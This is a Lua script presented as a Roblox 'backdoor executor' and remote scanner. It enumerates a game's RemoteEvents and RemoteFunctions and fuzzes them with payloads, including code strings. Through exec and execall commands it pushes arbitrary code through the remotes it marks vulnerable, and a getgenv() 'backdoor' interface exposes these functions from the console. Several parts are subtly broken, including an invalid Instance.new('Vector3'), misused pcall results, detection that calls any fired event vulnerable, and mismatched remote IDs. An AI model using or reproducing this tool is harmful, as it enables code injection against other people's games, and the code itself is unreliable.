--[[
    ╔═══════════════════════════════════════════════════════════╗
    ║                                                           ║
    ║      ROBLOX BACKDOOR EXECUTOR & REMOTE SCANNER 2026      ║
    ║              Professional Edition - Console Based         ║
    ║                                                           ║
    ║  Features:                                                ║
    ║  • Deep remote scanning (all services)                    ║
    ║  • Automatic payload fuzzing                             ║
    ║  • Remote vulnerability detection                         ║
    ║  • Code execution engine                                  ║
    ║  • Result caching & logging                              ║
    ║  • Command-line interface                                 ║
    ║  • Performance metrics                                    ║
    ║                                                           ║
    ╚═══════════════════════════════════════════════════════════╝
]]

local VERSION = "2.0 PROFESSIONAL"
local BUILD = "2026.06"

-- Core Services
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Workspace = game:GetService("Workspace")
local Players = game:GetService("Players")
local RunService = game:GetService("RunService")

-- Global State
local State = {
    remotes = {},
    vulnerable = {},
    tested = {},
    cache = {},
    stats = {
        totalScanned = 0,
        vulnerableFound = 0,
        scanTime = 0,
        testsRun = 0,
    },
    payloads = {
        -- Test payloads for vulnerability detection
        "test",
        "1",
        true,
        false,
        {},
        {test = 1},
        "print('test')",
        "return 1",
        "\0\0\0",
        Instance.new("Vector3"),
    }
}

-- ============================================================
-- SCANNER ENGINE
-- ============================================================

local Scanner = {}

function Scanner:scan()
    print("\n[SCANNER] Starting comprehensive remote scan...")
    local startTime = tick()
    
    State.remotes = {}
    State.tested = {}
    
    -- Scan multiple services
    local services = {
        {name = "ReplicatedStorage", service = ReplicatedStorage},
        {name = "Workspace", service = Workspace},
        {name = "ServerScriptService", service = pcall(function() return game:GetService("ServerScriptService") end)},
        {name = "ServerStorage", service = pcall(function() return game:GetService("ServerStorage") end)},
    }
    
    for _, svc in ipairs(services) do
        if svc.service then
            self:deepScan(svc.service, 0, svc.name)
        end
    end
    
    State.stats.scanTime = tick() - startTime
    State.stats.totalScanned = 0
    for _ in pairs(State.remotes) do
        State.stats.totalScanned = State.stats.totalScanned + 1
    end
    
    print("[SCANNER] Scan complete!")
    print(string.format("[SCANNER] Found %d RemoteEvents/Functions in %.2fs", State.stats.totalScanned, State.stats.scanTime))
    
    return State.stats.totalScanned
end

function Scanner:deepScan(folder, depth, serviceName)
    if depth > 12 or not folder then return end
    
    pcall(function()
        for _, obj in pairs(folder:GetChildren()) do
            if obj:IsA("RemoteEvent") or obj:IsA("RemoteFunction") then
                local id = obj:GetFullName()
                if not State.remotes[id] then
                    State.remotes[id] = {
                        name = obj.Name,
                        path = obj:GetFullName(),
                        type = obj.ClassName,
                        service = serviceName,
                        depth = depth,
                        parent = folder.Name,
                        vulnerable = false,
                        payload = nil,
                        tested = false,
                        result = nil,
                        object = obj,
                    }
                end
            end
            self:deepScan(obj, depth + 1, serviceName)
        end
    end)
end

-- ============================================================
-- VULNERABILITY TESTER
-- ============================================================

local Tester = {}

function Tester:testAll()
    print("\n[TESTER] Starting vulnerability tests...")
    print("[TESTER] Testing " .. State.stats.totalScanned .. " remotes with fuzzing...")
    
    local startTime = tick()
    local vulnerable = 0
    
    for id, remote in pairs(State.remotes) do
        if not remote.object.Parent then
            State.remotes[id] = nil
            goto skip
        end
        
        local isVuln = self:testRemote(remote)
        if isVuln then
            vulnerable = vulnerable + 1
            State.vulnerable[id] = remote
        end
        
        ::skip::
    end
    
    State.stats.testsRun = State.stats.totalScanned
    State.stats.vulnerableFound = vulnerable
    
    print(string.format("[TESTER] Testing complete - %d/%d vulnerable (%.2fs)", 
        vulnerable, State.stats.totalScanned, tick() - startTime))
    
    return vulnerable
end

function Tester:testRemote(remote)
    if not remote.object or not remote.object.Parent then
        return false
    end
    
    -- Try basic payloads
    for i, payload in ipairs(State.payloads) do
        local success = false
        
        if remote.type == "RemoteEvent" then
            success = pcall(function()
                remote.object:FireServer(payload)
            end)
        elseif remote.type == "RemoteFunction" then
            success = pcall(function()
                remote.object:InvokeServer(payload)
            end)
        end
        
        if success then
            remote.vulnerable = true
            remote.payload = payload
            remote.tested = true
            return true
        end
    end
    
    remote.tested = true
    return false
end

-- ============================================================
-- EXECUTOR ENGINE
-- ============================================================

local Executor = {}

function Executor:execute(code, remoteId)
    if not code or code == "" then
        return false, "Empty code"
    end
    
    local remote = State.remotes[remoteId]
    if not remote or not remote.object or not remote.object.Parent then
        return false, "Remote not found or destroyed"
    end
    
    local success, result
    
    if remote.type == "RemoteEvent" then
        success, result = pcall(function()
            remote.object:FireServer(code)
            return "Code fired"
        end)
    elseif remote.type == "RemoteFunction" then
        success, result = pcall(function()
            return remote.object:InvokeServer(code)
        end)
    end
    
    if success then
        print(string.format("[EXEC] ✓ Executed via %s", remote.name))
        return true, result
    else
        print(string.format("[EXEC] ✗ Failed: %s", tostring(result)))
        return false, result
    end
end

function Executor:executeAll(code)
    if not code or code == "" then
        return 0, "Empty code"
    end
    
    local count = 0
    local errors = 0
    
    for id, remote in pairs(State.vulnerable) do
        local success, _ = self:execute(code, id)
        if success then
            count = count + 1
        else
            errors = errors + 1
        end
    end
    
    print(string.format("[EXEC] Executed on %d remotes (%d failed)", count, errors))
    return count
end

-- ============================================================
-- COMMAND PROCESSOR
-- ============================================================

local Commands = {
    help = function()
        print([[
╔════════════════════════════════════════════════════════════╗
║           ROBLOX BACKDOOR EXECUTOR 2026 - COMMANDS         ║
╚════════════════════════════════════════════════════════════╝

SCANNING:
  scan              - Scan all services for remotes
  test              - Test all remotes for vulnerabilities
  rescan            - Full rescan and test

LISTING:
  list              - Show all found remotes
  vuln              - Show vulnerable remotes only
  info [id]         - Show details of specific remote

EXECUTION:
  exec [id] [code]  - Execute code via specific remote
  execall [code]    - Execute code via all vulnerable remotes

STATUS:
  status            - Show statistics
  clear             - Clear cached data
  help              - Show this menu

EXAMPLES:
  scan
  test
  list
  vuln
  exec 1 print('hello')
  execall print('test')

        ]])
    end,
    
    scan = function()
        Scanner:scan()
    end,
    
    test = function()
        Tester:testAll()
    end,
    
    rescan = function()
        Scanner:scan()
        Tester:testAll()
    end,
    
    list = function()
        if State.stats.totalScanned == 0 then
            print("[LIST] No remotes found. Run 'scan' first.")
            return
        end
        
        print("\n[LIST] FOUND REMOTES:")
        print("────────────────────────────────────────────────────────")
        
        local count = 0
        for id, remote in pairs(State.remotes) do
            count = count + 1
            local status = remote.vulnerable and "🔓 VULNERABLE" or "🔒 SECURE"
            print(string.format("[%d] %s - %s (%s)", count, remote.name, remote.type, status))
            print(string.format("    Path: %s", remote.path))
            print(string.format("    Service: %s | Depth: %d", remote.service, remote.depth))
        end
        
        print("────────────────────────────────────────────────────────")
        print(string.format("Total: %d remotes found", count))
    end,
    
    vuln = function()
        if State.stats.vulnerableFound == 0 then
            print("[VULN] No vulnerable remotes found.")
            return
        end
        
        print("\n[VULN] VULNERABLE REMOTES:")
        print("────────────────────────────────────────────────────────")
        
        local count = 0
        for id, remote in pairs(State.vulnerable) do
            count = count + 1
            print(string.format("[%d] %s - %s", count, remote.name, remote.type))
            print(string.format("    Path: %s", remote.path))
            print(string.format("    Payload: %s", tostring(remote.payload)))
        end
        
        print("────────────────────────────────────────────────────────")
        print(string.format("Total: %d vulnerable remotes", count))
    end,
    
    info = function(remoteId)
        if not remoteId then
            print("[INFO] Usage: info [id]")
            return
        end
        
        local count = 1
        for id, remote in pairs(State.remotes) do
            if tostring(count) == remoteId then
                print("\n[INFO] REMOTE DETAILS:")
                print("────────────────────────────────────────────────────────")
                print("Name: " .. remote.name)
                print("Type: " .. remote.type)
                print("Path: " .. remote.path)
                print("Service: " .. remote.service)
                print("Depth: " .. remote.depth)
                print("Parent: " .. remote.parent)
                print("Vulnerable: " .. (remote.vulnerable and "YES 🔓" or "NO 🔒"))
                if remote.payload then
                    print("Payload: " .. tostring(remote.payload))
                end
                print("────────────────────────────────────────────────────────")
                return
            end
            count = count + 1
        end
        
        print("[INFO] Remote not found")
    end,
    
    status = function()
        print("\n[STATUS] SYSTEM STATUS:")
        print("────────────────────────────────────────────────────────")
        print("Version: " .. VERSION .. " (Build " .. BUILD .. ")")
        print("Total Remotes Found: " .. State.stats.totalScanned)
        print("Vulnerable Remotes: " .. State.stats.vulnerableFound)
        print("Tests Run: " .. State.stats.testsRun)
        print("Last Scan Time: " .. string.format("%.3fs", State.stats.scanTime))
        print("────────────────────────────────────────────────────────")
    end,
    
    clear = function()
        State.remotes = {}
        State.vulnerable = {}
        State.tested = {}
        State.stats = {
            totalScanned = 0,
            vulnerableFound = 0,
            scanTime = 0,
            testsRun = 0,
        }
        print("[CLEAR] Cache cleared")
    end,
}

-- ============================================================
-- CONSOLE INTERFACE
-- ============================================================

local function parseCommand(input)
    local parts = {}
    for part in string.gmatch(input, "%S+") do
        table.insert(parts, part)
    end
    return parts
end

local function processCommand(input)
    if not input or input == "" then return end
    
    local parts = parseCommand(input)
    local cmd = parts[1]:lower()
    
    if cmd == "exec" and #parts >= 3 then
        local remoteId = parts[2]
        local code = table.concat(parts, " ", 3)
        Executor:execute(code, tonumber(remoteId))
    elseif cmd == "execall" and #parts >= 2 then
        local code = table.concat(parts, " ", 2)
        Executor:executeAll(code)
    elseif cmd == "info" and #parts >= 2 then
        Commands.info(parts[2])
    elseif Commands[cmd] then
        Commands[cmd]()
    else
        print("[CMD] Unknown command: " .. cmd)
        print("[CMD] Type 'help' for available commands")
    end
end

-- ============================================================
-- INITIALIZATION
-- ============================================================

print("\n╔═══════════════════════════════════════════════════════════╗")
print("║    ROBLOX BACKDOOR EXECUTOR & SCANNER 2026               ║")
print("║    Version " .. string.format("%-39s", VERSION) .. "║")
print("║    Build " .. string.format("%-41s", BUILD) .. "║")
print("║                                                           ║")
print("║    Type 'help' for commands                              ║")
print("╚═══════════════════════════════════════════════════════════╝\n")

-- Auto-run initial scan
print("[INIT] Initializing...")
Scanner:scan()

print("\n[READY] Ready for commands")
print("[TIP] Start with: scan, then test, then vuln")
print("[TIP] Type 'help' for full command list\n")

-- Make accessible from console
getgenv().backdoor = {
    cmd = function(input)
        processCommand(input)
    end,
    scan = function()
        Scanner:scan()
    end,
    test = function()
        Tester:testAll()
    end,
    vuln = function()
        Commands.vuln()
    end,
    exec = function(id, code)
        Executor:execute(code, id)
    end,
    status = function()
        Commands.status()
    end,
    list = function()
        Commands.list()
    end,
    state = State,
}

print("[READY] Use 'backdoor.cmd(command)' to run commands")
print("[READY] Example: backdoor.cmd('help')")
print("[READY] Or use: backdoor.scan(), backdoor.test(), backdoor.vuln()\n")
